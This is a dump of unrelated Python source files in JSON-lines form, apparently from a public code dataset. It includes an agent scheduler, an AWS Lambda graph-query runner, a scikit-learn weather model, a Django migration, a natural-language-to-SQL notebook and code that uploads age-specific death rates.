self.has_keep_awake.remove(agent.uuid)\n del self.agents[agent.uuid]\n\n def run(self, seconds=None, iterations=None, pause_if_idle=True, clear_alarms_at_end=True):\n \"\"\" The main 'run' operation of the 
Scheduler.\n\n        :param seconds: float, int, None: optional number of real-time seconds to run.\n        :param iterations: int, None: a feature to let the scheduler run for\n            N (`iterations`) updates before pausing.\n        :param pause_if_idle: boolean: default=True: If no new messages are exchanged\n            the scheduler's clock will tick along as any other real-time system.\n            If pause_if_idle is set to True, the scheduler will pause once the message queue\n            is idle.\n        :param clear_alarms_at_end: boolean: deletes any alarms if paused.\n\n        The simulation is paused as soon as the first of 'seconds' or 'iterations'\n        is reached.\n        \"\"\"\n        start_time = None\n        if isinstance(seconds, (int, float)) and seconds > 0:\n            start_time = time.time()\n\n        iterations_to_halt = None\n        if isinstance(iterations, int) and iterations > 0:\n            iterations_to_halt = abs(iterations)\n\n        assert isinstance(pause_if_idle, bool)\n        assert isinstance(clear_alarms_at_end, bool)\n\n        # check all agents for messages (in case someone on the outside has added messages).\n        updated_agents = {agent.uuid for agent in self.agents.values() if agent.inbox or agent.keep_awake}\n        self.needs_update.update(updated_agents)\n        self.process_mail_queue()\n\n        # The main loop of the scheduler:\n        self._quit = False\n        while not self._quit:  # _quit is set by method self.pause() and can be called by any agent.\n\n            # update the agents.\n            self.needs_update.update(self.has_keep_awake)\n            for uuid in self.needs_update:\n                agent = self.agents[uuid]\n                agent.update()\n                if agent.keep_awake:\n                    self.has_keep_awake.add(agent.uuid)\n                else:\n                    self.has_keep_awake.discard(agent.uuid)\n            self.needs_update.clear()\n\n            # check any timed alarms.\n            self.check_alarms()\n\n            # distribute messages or sleep.\n            no_messages = len(self.mail_queue) == 0\n            if self.mail_queue:\n                self.process_mail_queue()\n\n            # determine whether to stop:\n            if start_time is not None:\n                now = time.time()\n                if now >= (start_time + seconds):\n                    self._quit = True\n\n            if iterations_to_halt is not None:\n                if iterations_to_halt > 0:\n                    iterations_to_halt -= 1\n                if iterations_to_halt == 0:\n                    self._quit = True\n\n            if no_messages:\n                if self._must_run_until_alarm_expires is True:\n                    time.sleep(1 / self._operating_frequency)\n                elif pause_if_idle:\n                    self._quit = True\n\n        if clear_alarms_at_end:\n            self.alarms.clear()\n\n    def process_mail_queue(self):\n        \"\"\"\n        Distributes the mail, so that when the scheduler pauses, users can\n        debug the agents starting from a fresh state with new messages.\n        \"\"\"\n        while self.mail_queue:\n            msg = self.mail_queue.popleft()\n            if isinstance(msg, AgentMessage):\n                topic = msg.topic\n                receiver = msg.receiver\n                recipients = set()\n                # 1. collect the list of recipients\n                if receiver in self.mailing_lists:\n                    recipients.update(self.mailing_lists[receiver])\n                if topic in self.mailing_lists:  # then it's a tracked topic\n                    recipients.update(self.mailing_lists[topic])\n                # 2. distribute the mail.\n                if len(recipients) > 0:  # receiver may not be in self.mailing_lists, as he/she/it might be moving.\n                    self.send_to_recipients(msg=msg, recipients=recipients)\n                else:\n                    self.log(level=DEBUG, msg=\"{} is not registered on a mailing list.\".format(receiver))\n            else:\n                self.log(level=WARNING,\n                         msg=\"Discovered a non-AgentMessage in the inbox. 
The message is dumped.\")\n\n    def send_to_recipients(self, msg, recipients):\n        \"\"\" Distributes AgentMessages to all registered recipients.\n        :param msg: an instance of AgentMessage\n        :param recipients: The registered recipients\n        \"\"\"\n        for uuid in recipients:  # this loop is necessary as a tracker may be on the receiver.\n            agent = self.agents.get(uuid, None)\n            if agent is None:\n                continue\n            self.needs_update.add(uuid)\n            if len(recipients) == 1:\n                agent.inbox.append(msg)\n            else:\n                agent.inbox.append(msg.copy())  # copy per recipient, so that no two agents share (and mutate) the same message object.\n\n    def pause(self):\n        self._quit = True\n\n    def set_alarm(self, uuid, alarm_time, alarm_message, ignore_alarm_if_idle):\n        now = time.time()\n        assert alarm_time > now, \"Alarm time is in the past\"\n        self.alarms.append(Alarm(uuid, alarm_time, alarm_message, ignore_alarm_if_idle))\n        self.alarms.sort(key=lambda x: x.alarm_time)\n        if ignore_alarm_if_idle is False:\n            self._must_run_until_alarm_expires = True\n\n    def check_alarms(self):\n        now = time.time()\n        expired_alarms = [a for a in self.alarms if now >= a.alarm_time]\n        if not expired_alarms:\n            return\n        self.alarms = [a for a in self.alarms if now < a.alarm_time]\n        self._must_run_until_alarm_expires = any(a for a in self.alarms if a.ignore_alarm_if_idle is False)\n        for alarm in expired_alarms:\n            assert isinstance(alarm, Alarm)\n            agent = self.agents.get(alarm.uuid, None)\n            if agent is None:  # agent could have been removed.\n                continue\n            self.needs_update.add(alarm.uuid)\n            if alarm.alarm_message is not None:\n                agent.inbox.append(alarm.alarm_message)\n\n    def subscribe(self, uuid, topic):\n        \"\"\" subscribe lets the Agent react to SubscribeMessage and adds the subscriber\n        to the registered subscribers. Used by default during `_setup` by all agents.\n        :param uuid:\n        :param topic:\n        :return:\n\n        Notes: The method adds the agent to the subscriber list.\n        Any agent may subscribe to the same topic many times (this is managed).\n        \"\"\"\n        assert uuid in self.agents, \"uuid not in scheduler.\"\n        if topic not in self.mailing_lists:\n            self.mailing_lists[topic] = set()\n        self.log(level=DEBUG, msg=\"%s requesting topics added: %s\" % (uuid, topic))\n        if uuid not in self.mailing_lists[topic]:\n            self.mailing_lists[topic].add(uuid)\n            if topic == uuid:\n                self.log(level=DEBUG, msg=\"%s subscribing to messages for itself.\" % (uuid))\n            else:\n                self.log(level=DEBUG, msg=\"%s subscribing to topic: %s\" % (uuid, topic))\n        else:\n            self.log(level=DEBUG, msg=\"%s already subscribing to topic: %s\" % (uuid, topic))\n\n    def unsubscribe(self, uuid, topic=None):\n        \"\"\" unsubscribes a subscriber from messages.\n        :param uuid: agent uuid\n        :param topic: str, if None, all topics are unsubscribed from.\n        \"\"\"\n        if topic is not None:\n            self.mailing_lists[topic].remove(uuid)\n            if len(self.mailing_lists[topic]) == 0:\n                del self.mailing_lists[topic]\n            return\n\n        for topic in [t for t in self.mailing_lists.keys()]:\n            self.mailing_lists[topic].discard(uuid)\n            if len(self.mailing_lists[topic]) == 0:\n                del self.mailing_lists[topic]\n\n    def get_subscriber_list(self, topic):\n        \"\"\" Returns the list of subscribers of a particular topic.\"\"\"\n        if topic in self.mailing_lists:\n            return self.mailing_lists.get(topic).copy()\n        return []\n\n    def get_subscription_topics(self):\n        \"\"\" Returns the list of subscription topics.\"\"\"\n        return [t for t in 
self.mailing_lists.keys()]\n\n\n","sub_path":"maslite/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":24377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"418513042","text":"#!/usr/bin/env python3\n\"\"\"Run a query against the latest graph for a given name and optional version.\nRun as a lambda this calls Neptune.\nRun from the command line this finds the runquery lambda, sends a query to it and\nreads the results from S3.\n\"\"\"\nimport hashlib\nimport json\nimport sys\nimport time\n\nimport boto3\n\nfrom altimeter.core.awslambda import get_required_lambda_env_var, get_required_lambda_event_var\nfrom altimeter.core.neptune.client import AltimeterNeptuneClient, NeptuneEndpoint\n\n\ndef lambda_handler(event, context):\n graph_names_list = get_required_lambda_event_var(event, \"graph_names\")\n if not isinstance(graph_names_list, list):\n raise ValueError(f\"Value for graph_names should be a list. Is {type(graph_names_list)}\")\n graph_names = set(graph_names_list)\n query = get_required_lambda_event_var(event, \"query\")\n if not isinstance(query, str):\n raise ValueError(f\"Value for query should be a str. Is {type(query)}\")\n max_age_min = get_required_lambda_event_var(event, \"max_age_min\")\n if not isinstance(max_age_min, int):\n raise ValueError(f\"Value for max_age_min should be an int. Is {type(max_age_min)}\")\n\n host = get_required_lambda_env_var(\"NEPTUNE_HOST\")\n port = get_required_lambda_env_var(\"NEPTUNE_PORT\")\n region = get_required_lambda_env_var(\"NEPTUNE_REGION\")\n results_bucket = get_required_lambda_env_var(\"RESULTS_BUCKET\")\n\n endpoint = NeptuneEndpoint(host=host, port=port, region=region)\n client = AltimeterNeptuneClient(max_age_min=max_age_min, neptune_endpoint=endpoint)\n query_result = client.run_query(graph_names=graph_names, query=query)\n\n csv_results = query_result.to_csv()\n\n query_hash = hashlib.sha256(query.encode()).hexdigest()\n now_str = str(int(time.time()))\n results_key = \"/\".join((\"-\".join(graph_names), query_hash, f\"{now_str}.csv\"))\n s3_client = boto3.Session().client(\"s3\")\n s3_client.put_object(Bucket=results_bucket, Key=results_key, Body=csv_results)\n\n return {\n \"results_bucket\": results_bucket,\n \"results_key\": results_key,\n \"num_results\": query_result.get_length(),\n }\n\n\ndef get_runquery_lambda_name():\n runquery_lambda_name_prefix = \"ITCloudGraph-RunQuery-\"\n lambda_client = boto3.client(\"lambda\")\n paginator = lambda_client.get_paginator(\"list_functions\")\n for resp in paginator.paginate():\n for func in resp[\"Functions\"]:\n if func[\"FunctionName\"].startswith(runquery_lambda_name_prefix):\n return func[\"FunctionName\"]\n raise ValueError(\n (\n f\"Unable to find a runquery lambda with name starting with \"\n f\"{runquery_lambda_name_prefix}\"\n )\n )\n\n\ndef main(argv=None):\n import argparse\n\n if argv is None:\n argv = sys.argv[1:]\n parser = argparse.ArgumentParser()\n parser.add_argument(\"query_file\", type=str)\n parser.add_argument(\"--graph_names\", type=str, default=[\"alti\"], nargs=\"+\")\n parser.add_argument(\"--max_age_min\", type=int, default=1440)\n args_ns = parser.parse_args(argv)\n\n with open(args_ns.query_file, \"r\") as query_fp:\n query = query_fp.read()\n\n runquery_lambda_name = get_runquery_lambda_name()\n\n payload = {\n \"graph_names\": args_ns.graph_names,\n \"max_age_min\": args_ns.max_age_min,\n \"query\": query,\n }\n payload_bytes = json.dumps(payload).encode(\"utf-8\")\n 
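# For reference, with the argparse defaults below the event received by the\n    # lambda handler looks like:\n    #   {\"graph_names\": [\"alti\"], \"max_age_min\": 1440, \"query\": \"<contents of query_file>\"}\n    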
lambda_client = boto3.client(\"lambda\")\n invoke_lambda_resp = lambda_client.invoke(\n FunctionName=runquery_lambda_name, Payload=payload_bytes\n )\n lambda_resp_bytes = invoke_lambda_resp[\"Payload\"].read()\n lambda_resp_str = lambda_resp_bytes.decode(\"utf-8\")\n lambda_resp = json.loads(lambda_resp_str)\n if \"errorMessage\" in lambda_resp:\n print(\"Error running query:\")\n print(lambda_resp[\"errorMessage\"])\n sys.exit(1)\n results_bucket = lambda_resp[\"results_bucket\"]\n results_key = lambda_resp[\"results_key\"]\n s3_client = boto3.client(\"s3\")\n s3_resp = s3_client.get_object(Bucket=results_bucket, Key=results_key)\n results_bytes = s3_resp[\"Body\"].read()\n results_str = results_bytes.decode(\"utf-8\")\n print(results_str)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"bin/runquery.py","file_name":"runquery.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"338888403","text":"import requests, zipfile, StringIO, gzip\nimport urllib\n\ntestfile = urllib.URLopener()\ntestfile.retrieve(\"http://s3.amazonaws.com/thedataincubator/coursedata/mldata/train.txt.gz\", \"train.txt.gz\")\n\nimport gzip\nwith gzip.open('train.txt.gz', 'rb') as f:\n content = f.readlines()\n\nimport re\nfor line in content:\n re.sub('\\n','',line)\nimport pandas as pd\ndata = pd.read_csv('train.txt.gz',sep=r\"\\s*\",header=None)\ndata.columns = ['year','month','day','hour','temp','dew_temp','pressure','wind_angle','wind_speed','sky_code','rain_hour','rain_6hour','city']\n\n\n# In[6]:\n\ndata.head()\nfrom datetime import datetime\n\n\ndata['time'] = data.apply(lambda x:datetime.strptime(\"{0} {1} {2} {3}:00:00\".format(x['year'],x['month'], x['day'],x['hour']), \"%Y %m %d %H:%M:%S\"),axis=1)\n\n\n# In[41]:\n\ndf = data[['time','temp','dew_temp','pressure','wind_angle','wind_speed','sky_code','rain_hour','rain_6hour','city']]\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn import pipeline\n\n\n# In[56]:\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\nclass ColumnSelectTransform(BaseEstimator, TransformerMixin):\n def __init__(self):\n import numpy as np\n import pandas as pd\n pass\n def fit(self,X,y=None):\n return self\n def transform(self, X):\n import numpy as np\n import pandas as pd\n if X == 'train.txt.gz':\n data = pd.read_csv(X,sep=r\"\\s*\",header=None)\n data.columns = ['year','month','day','hour','temp','dew_temp','pressure','wind_angle','wind_speed','sky_code','rain_hour','rain_6hour','city']\n data = data[data.temp != -9999]\n data.city = data.city.replace('bos',1)\n data.city = data.city.replace('bal',2)\n data.city = data.city.replace('chi',3)\n data.city = data.city.replace('nyc',4)\n data.city = data.city.replace('phi',5)\n return np.array(data[['month','day','hour','city']])\n else:\n data = X.split()\n if data[12] == 'bos':\n city = 1\n elif data[12] == 'bal':\n city = 2\n elif data[12] == 'chi':\n city = 3\n elif data[12] == 'nyc':\n city = 4\n elif data[12] == 'phi':\n city=5\n return np.array([int(data[1]),int(data[2]),int(data[3]),city])\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_extraction import DictVectorizer\nmonth_hour_pipe = pipeline.Pipeline([\n ('transformer', ColumnSelectTransform()),\n ('estimator', KNeighborsRegressor(n_neighbors=5))\n ])\nmonth_hour_pipe.fit('train.txt.gz', data[data.temp 
!= -9999].temp)\nimport dill\ndill.dump(month_hour_pipe, open(\"month_hour_pipe\", 'wb'))","sub_path":"work-ts-new.py","file_name":"work-ts-new.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"89027786","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app01', '0080_auto_20180622_1059'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='documentdata',\n name='newpic',\n field=models.ImageField(default='upload_imgss/logo.jpg', verbose_name='封面图片(160x120)', upload_to='upload_imgss'),\n ),\n ]\n","sub_path":"app01/migrations/0081_auto_20180623_2322.py","file_name":"0081_auto_20180623_2322.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"28843081","text":"from datetime import datetime\n\nfrom bo.BusinessObject import BusinessObject\n\n\nclass Article(BusinessObject):\n def __init__(self):\n \"\"\"Artikel, der für eine Gruppe erstellt wird.\"\"\"\n super().__init__()\n self._group = None # nur als id (Fremdschlüssel)\n self._count = 0\n\n def __str__(self):\n return \"Article: {}, part of group: {}\".format(self.get_name(),\n self.get_group())\n\n def get_group(self):\n \"\"\"Auslesen des Fremdschlüssels Gruppe\"\"\"\n return self._group\n\n def get_count(self):\n \"\"\"Auslesen der Anzahl, die der Artikel gekauft wurde\"\"\"\n return self._count\n\n def set_group(self, group_id):\n \"\"\"Setzen des Fremdschlüssels Gruppe\"\"\"\n self._group = group_id\n\n def set_count(self, count):\n \"\"\"Setzen der Anzahl, die der Artikel gekauft wurde\"\"\"\n self._count = count\n\n\n def to_dict(self):\n \"\"\"Umwandeln Article() in ein Python dict()\"\"\"\n result = {\n \"id\": self.get_id(),\n \"name\": self.get_name(),\n \"groupId\": self.get_group(),\n \"count\": self.get_count(),\n \"creationDate\": self.get_creation_date(),\n \"lastUpdated\": self.get_last_updated()\n }\n return result\n\n @staticmethod\n def from_dict(dictionary=dict()):\n \"\"\"Umwandeln eines Python dict() in einen Article()\"\"\"\n article = Article()\n article.set_id(dictionary[\"id\"])\n article.set_name(dictionary[\"name\"])\n article.set_group(dictionary[\"groupId\"])\n article.set_count(dictionary[\"count\"])\n article.set_creation_date(Article.date_format(dictionary[\"creationDate\"]))\n article.set_last_updated(Article.date_format(dictionary[\"lastUpdated\"]))\n return article\n\n @staticmethod\n def from_tuples(tuples=list()):\n \"\"\"Umwandeln eines DB tuples in einen Article() (Python Objekt)\"\"\"\n result = []\n for (article_id, name, creation_date, group, last_updated) in tuples:\n article = Article()\n article.set_id(article_id)\n article.set_name(name)\n article.set_group(group)\n article.set_creation_date(creation_date)\n article.set_last_updated(last_updated)\n result.append(article)\n return result\n","sub_path":"src/bo/Article.py","file_name":"Article.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"519168200","text":"import json\nimport time\nimport threading\nfrom libs.config.config import control_dict\nfrom libs.utils.logger.log import Logger\nfrom libs.utils.redis.connect import connect\n\n\nclass ReportThread(threading.Thread):\n def __init__(self):\n 
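# Worker thread: run() pops one URL from the result_report_list, api()\n        # prints the scan results stored for that URL, and the URL is then\n        # pushed onto the resource_reclaim_list for cleanup.\n        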
super(ReportThread, self).__init__()\n self.start_at = time.time()\n self.end_at = None\n self.redis_cnt = connect()\n\n def run(self):\n try:\n start = time.strftime(time.strftime('%H:%M:%S', time.localtime(time.time())))\n url = self.redis_cnt.rpop(control_dict['result_report_list']).decode()\n self.api(url)\n self.end_at = time.time()\n end = time.strftime(time.strftime('%H:%M:%S', time.localtime(time.time())))\n log_msg = (\n '[report]: {}\\n'.format(url),\n '[start]: {}\\n'.format(start),\n '[cost]: {}\\n'.format(self.end_at - self.start_at),\n '[end]: {}\\n\\n'.format(end)\n )\n Logger.running(log_msg)\n except AttributeError:\n pass\n except Exception as err_msg:\n log = Logger.error()\n log(err_msg)\n\n def api(self, url):\n\n for script in self.redis_cnt.hkeys('{}_information_gathering_result_list'.format(url)):\n print('\\n')\n print(script.decode())\n script_result = self.redis_cnt.hget('{}_information_gathering_result_list'.format(url), script)\n script_result = json.loads(script_result)\n for result in script_result:\n print(result)\n print('\\n')\n for plugin in self.redis_cnt.hkeys('{}_leak_scanning_result_list'.format(url)):\n print('\\n')\n print(plugin.decode())\n plugin_result = self.redis_cnt.hget('{}_leak_scanning_result_list'.format(url), plugin)\n plugin_result = json.loads(plugin_result)\n for result in plugin_result:\n print(result)\n print('\\n')\n self.redis_cnt.lpush(control_dict['resource_reclaim_list'], url)\n","sub_path":"ControlUnit/libs/core/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"267047606","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.4.2\n# kernelspec:\n# display_name: NaLIR-SBBD\n# language: python\n# name: nalir-sbbd\n# ---\n\nfrom nalir import *\n\nconfig_json_text = '''{\n \"connection\":{\n \"host\": \"localhost\",\n \"password\":\"desenvolvimento123\",\n \"user\":\"nalir\",\n \"database\":\"anp\"\n },\n \"loggingMode\": \"ERROR\",\n \"zfiles_path\":\"/home/novello/nalir-glamorise/zfiles\",\n \"jars_path\":\"/home/novello/nalir-glamorise/jars/new_jars\"\n}\n'''\nconfig = ConfigHandler(reset=True,config_json_text=config_json_text)\n\nrdbms = RDBMS(config)\n\n# nlq_before='What was the monthly production of oil in the state of Rio de Janeiro and year 2015?'\n# change_order = true\n# relace_text = {monthly : per year per month}\n# nlq_after='What was the production of oil per year per month in the state of Rio de Janeiro and year 2015?'\n# nlq_before='What was the the field with the highest gas production?'\n# replace_text_before = {gas production : production of gas} <-- ainda não precisa envelope noun resolve\n# envelope_noun = true\n# relace_text = {highest : per}\n# nlq_after='What was the the field with the per \"production of gas\"?'\n#nlq='What was the \"production of oil\" per \"year\" per \"month\" in the state of Rio de Janeiro and year 2015?'\n\nnlq='What was the the field with the highest anp_gas_production?'\nquery = Query(nlq,rdbms.schema_graph)\n\n# ## Stanford Dependency Parser\n\nStanfordParser(query,config)\nquery.parse_tree\n\n# **Important Note**: The graph vizualitation requires the program [Graphviz](https://graphviz.org/) (alongside with the graphviz python package) to be installed.\n\nquery.parse_tree.show()\n\n# ## Node Mapper\nimport 
nltk\n#nltk.download('averaged_perceptron_tagger')\n#nltk.download('wordnet')\n#nltk.download('punkt')\nNodeMapper.phrase_process(query,rdbms,config)\n\nquery.parse_tree.show()\n\n# ## Entity Resolution\n\n# The entity pairs denote that two nodes represente the same entity.\n\nentity_resolute(query)\nquery.entities\n\n# ## Tree Structure Adjustor\n\nTreeStructureAdjustor.tree_structure_adjust(query,rdbms)\nquery.query_tree.show()\n\n# ## Explainer\n\nexplain(query)\nquery.query_tree.show()\n\n# ## SQL Translator\n\n# **Important Node**: The error message is resultant of line 191 of file data_structure/block.py\n\ntranslate(query, rdbms)\nprint('nlq: ', nlq)\nprint('query: ', query.translated_sql)\n","sub_path":"NaLIR_ANP.py","file_name":"NaLIR_ANP.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"584220930","text":"import sys\nimport string\nfrom PythonChallenges.Challenge2 import ChallengeTwo\nfrom PythonChallenges.Challenge1 import ChallengeOne, ChallengeOneAlt\nfrom PythonChallenges.Challenge3 import ChallengeThree\nfrom PythonChallenges.Challenge4 import ChallengeFour\n\ndef _printMenu ( ):\n print ()\n print (\"1: Challenge 1.\")\n print (\"1a: Challenge 1 Alt.\")\n print (\"2: Challenge 2.\")\n print (\"3: Challenge 3.\")\n print (\"4: Challenge 4.\")\n print (\"X: Exit\")\n pass\n\ndef _processMenu ( ):\n userInput = input(\"Select an option: \").upper()\n \n if userInput == \"1\":\n ChallengeOne()\n return True\n elif userInput == \"1A\":\n ChallengeOneAlt()\n return True\n elif userInput == \"2\": \n ChallengeTwo()\n return True\n elif userInput == \"3\":\n ChallengeThree()\n return True\n elif userInput == \"4\":\n ChallengeFour()\n return True\n elif userInput == \"X\":\n print ( \"Goodbye.\" )\n return False\n else:\n print ( \"Command not recognized, sorry!\")\n return True\n\ndef RunPythonChallenge():\n \n while True:\n _printMenu()\n if not _processMenu():\n break\n \n \n pass\n\n\n\n","sub_path":"Algorithms/Algorithms/PythonChallenges/PythonChallenge.py","file_name":"PythonChallenge.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"42328673","text":"\"\"\"Upload and download of age-specific death rate, which is\nall-cause mortality rate, by age.\"\"\"\nimport pandas as pd\nfrom numpy import nan\n\nfrom cascade.core.db import cursor, db_queries, repeat_request\nfrom cascade.core.log import getLoggers\nfrom cascade.input_data.db import AGE_GROUP_SET_ID\nfrom cascade.input_data.db.data_iterator import grouped_by_count\nfrom cascade.runner.application_config import application_config\nfrom cascade.stats.estimation import bounds_to_stdev\n\nCODELOG, MATHLOG = getLoggers(__name__)\n\n\ndef _asdr_in_t3(execution_context, model_version_id):\n \"\"\"Checks if data for the current model_version_id already exists in tier 3.\n \"\"\"\n query = \"\"\"\n SELECT DISTINCT location_id\n FROM epi.t3_model_version_asdr\n WHERE model_version_id = %(model_version_id)s\n \"\"\"\n with cursor(execution_context) as c:\n c.execute(query, args={\"model_version_id\": model_version_id})\n location_rows = c.fetchall()\n\n return [row[0] for row in location_rows]\n\n\ndef get_asdr_formatted(choices_dict):\n \"\"\"\n Retrieves ASDR data and formats it so that we know exactly what columns\n there are.\n \"\"\"\n gbd_round_id = choices_dict[\"gbd_round_id\"]\n demo_dict = 
db_queries.get_demographics(gbd_team=\"epi\", gbd_round_id=gbd_round_id)\n choices_dict.update(dict(\n age_group_id=demo_dict[\"age_group_id\"],\n sex_id=demo_dict[\"sex_id\"],\n ))\n asdr = repeat_request(db_queries.get_envelope)(**choices_dict)\n\n nulls = asdr[\"mean\"].isnull().sum()\n if nulls > 0:\n MATHLOG.info(f\"Removing {nulls} null values from mean of age-specific death rate.\")\n asdr = asdr[asdr[\"mean\"].notnull()]\n\n cols = [\"age_group_id\", \"location_id\", \"year_id\", \"sex_id\", \"mean\", \"upper\", \"lower\"]\n return asdr[cols]\n\n\ndef get_asdr_global(gbd_round_id, decomp_step, location_set_version_id, with_hiv):\n r\"\"\"Gets the age-specific death rate from IHME databases.\n This is :math:`{}_nm_x`, the mortality rate. This gets rates, not counts.\n This gets data for all locations, specified by location set.\n \"\"\"\n CODELOG.debug(f\"get_asdr_global: round {gbd_round_id} decomp {decomp_step}\")\n return get_asdr_formatted(dict(\n location_set_version_id=location_set_version_id,\n location_id=\"all\",\n year_id=-1,\n gbd_round_id=gbd_round_id,\n decomp_step=decomp_step,\n with_hiv=with_hiv,\n rates=True,\n ))\n\n\ndef get_asdr_data(gbd_round_id, decomp_step, location_and_children, with_hiv):\n r\"\"\"Gets the age-specific death rate from IHME databases.\n This is :math:`{}_nm_x`, the mortality rate. This gets rates, not counts.\n Gets data only for locations specified.\n \"\"\"\n CODELOG.debug(f\"get_asdr_data round {gbd_round_id} decomp {decomp_step} \"\n f\"for locations {location_and_children}\")\n return get_asdr_formatted(dict(\n location_id=list(location_and_children),\n year_id=-1,\n gbd_round_id=gbd_round_id,\n decomp_step=decomp_step,\n with_hiv=with_hiv,\n rates=True,\n ))\n\n\ndef asdr_as_fit_input(\n location_set_version_id, included_locations, sexes, gbd_round_id,\n decomp_step, ages_df, with_hiv\n):\n r\"\"\"Gets age-specific death rate (ASDR) from database and formats as\n input data. This is :math:`{}_nm_x`, the mortality rate by age group.\n Returns rates, not counts.\n\n Args:\n location_set_version_id (int): Location set version for which\n to retrieve the data. This is all locations.\n included_locations (List[int]): The locations in this run.\n If the locations we need are less than ``small-location-count``,\n then retrieve data only for those locations.\n sexes (List[int]): 1, 2, 3, or 4. Sex_id.\n gbd_round_id (int): GBD round identifies consistent data sets.\n ages_df (pd.DataFrame): Age_id to age mapping.\n with_hiv (bool): whether to include HIV deaths in mortality.\n\n Returns:\n pd.DataFrame: Columns are ``integrand``, ``hold_out``, ``density``,\n ``eta``, ``nu``, ``time_lower``, ``time_upper``, ``age_lower``,\n ``age_upper``, and ``location``, ``sex_id``.\n \"\"\"\n parameters = application_config()[\"NonModel\"]\n # Why not download all every time? 
It's really slow for testing.\n small_number_locations = parameters.getint(\"small-location-count\")\n if included_locations is not None and len(included_locations) < small_number_locations:\n # Call db_queries multiple times because it uses the SQL in set()\n # syntax, which fails when the set is large.\n locations_per_query = parameters.getint(\"locations-per-query\")\n multiple_asdr = list()\n for location_bunch in grouped_by_count(included_locations, locations_per_query):\n piece = get_asdr_data(gbd_round_id, decomp_step, location_bunch, with_hiv)\n multiple_asdr.append(piece)\n asdr = pd.concat(multiple_asdr, axis=0, ignore_index=True, sort=False)\n CODELOG.debug(f\"asdr_as_fit_input Retrieving {len(asdr)} ASDR for {included_locations}.\")\n else:\n asdr = get_asdr_global(gbd_round_id, decomp_step, location_set_version_id, with_hiv)\n CODELOG.debug(\n f\"asdr_as_fit_input Retrieving {len(asdr)} ASDR for \"\n f\"location_set_version_id {location_set_version_id}.\")\n assert not (set(asdr.age_group_id.unique()) - set(ages_df.age_group_id.values))\n return asdr_by_sex(asdr, ages_df, sexes)\n\n\ndef asdr_by_sex(asdr, ages, sexes):\n \"\"\"Incoming age-specific death rate has ``age_id`` and upper and lower\n bounds. This translates those into age-ranges, time-ranges, and standard\n deviations.\"\"\"\n CODELOG.debug(f\"asdr_by_sex for sexes {sexes}\")\n without_weight = ages.drop(columns=[\"age_group_weight_value\"])\n as_up_low = without_weight.rename({\"age_group_years_start\": \"age_lower\", \"age_group_years_end\": \"age_upper\"},\n axis=\"columns\")\n with_ages = asdr.merge(as_up_low, on=\"age_group_id\", how=\"left\")\n with_upper = with_ages.assign(time_upper=with_ages.year_id + 1)\n with_times = with_upper.rename(columns=dict(year_id=\"time_lower\", location_id=\"location\"))\n with_std = with_times.assign(std=bounds_to_stdev(with_times.lower, with_times.upper))\n rest = with_std.assign(\n integrand=\"mtother\",\n hold_out=0,\n density=\"gaussian\",\n eta=nan,\n nu=nan,\n )\n trimmed = rest.drop(columns=[\"age_group_id\", \"upper\", \"lower\"])\n return trimmed.query(\"sex_id in @sexes\")\n\n\ndef _upload_asdr_data_to_tier_3(gbd_round_id, cursor, model_version_id, asdr_data):\n \"\"\"Uploads ASDR data to tier 3 attached to the current model_version_id.\n \"\"\"\n\n insert_query = f\"\"\"\n INSERT INTO epi.t3_model_version_asdr (\n model_version_id,\n year_id,\n location_id,\n sex_id,\n age_group_id,\n mean,\n upper,\n lower,\n age_upper,\n age_lower\n ) VALUES (\n {model_version_id}, {\", \".join([\"%s\"]*9)}\n )\n \"\"\"\n\n age_group_data = db_queries.get_age_metadata(\n age_group_set_id=AGE_GROUP_SET_ID, gbd_round_id=gbd_round_id\n )[[\"age_group_id\", \"age_group_years_start\", \"age_group_years_end\"]]\n\n age_group_data = age_group_data.rename(columns={\n \"age_group_years_start\": \"age_lower\",\n \"age_group_years_end\": \"age_upper\"\n })\n asdr_data = asdr_data.merge(age_group_data, how=\"left\", on=\"age_group_id\")\n asdr_data = asdr_data.where(pd.notnull(asdr_data), None)\n\n ordered_cols = [\n \"year_id\",\n \"location_id\",\n \"sex_id\",\n \"age_group_id\",\n \"mean\",\n \"upper\",\n \"lower\",\n \"age_upper\",\n \"age_lower\",\n ]\n asdr_data = asdr_data[ordered_cols]\n cursor.executemany(insert_query, asdr_data.values.tolist())\n CODELOG.debug(f\"uploaded {len(asdr_data)} lines of asdr data\")\n\n\ndef load_asdr_to_t3(execution_context, data_access, location_and_children):\n \"\"\"\n Upload to t3_model_version_asdr if it's not already there.\n \"\"\"\n 
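# Idempotency: only locations that have no ASDR rows in tier 3 for this\n    # model_version_id are fetched and uploaded, so repeated runs are no-ops.\n    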
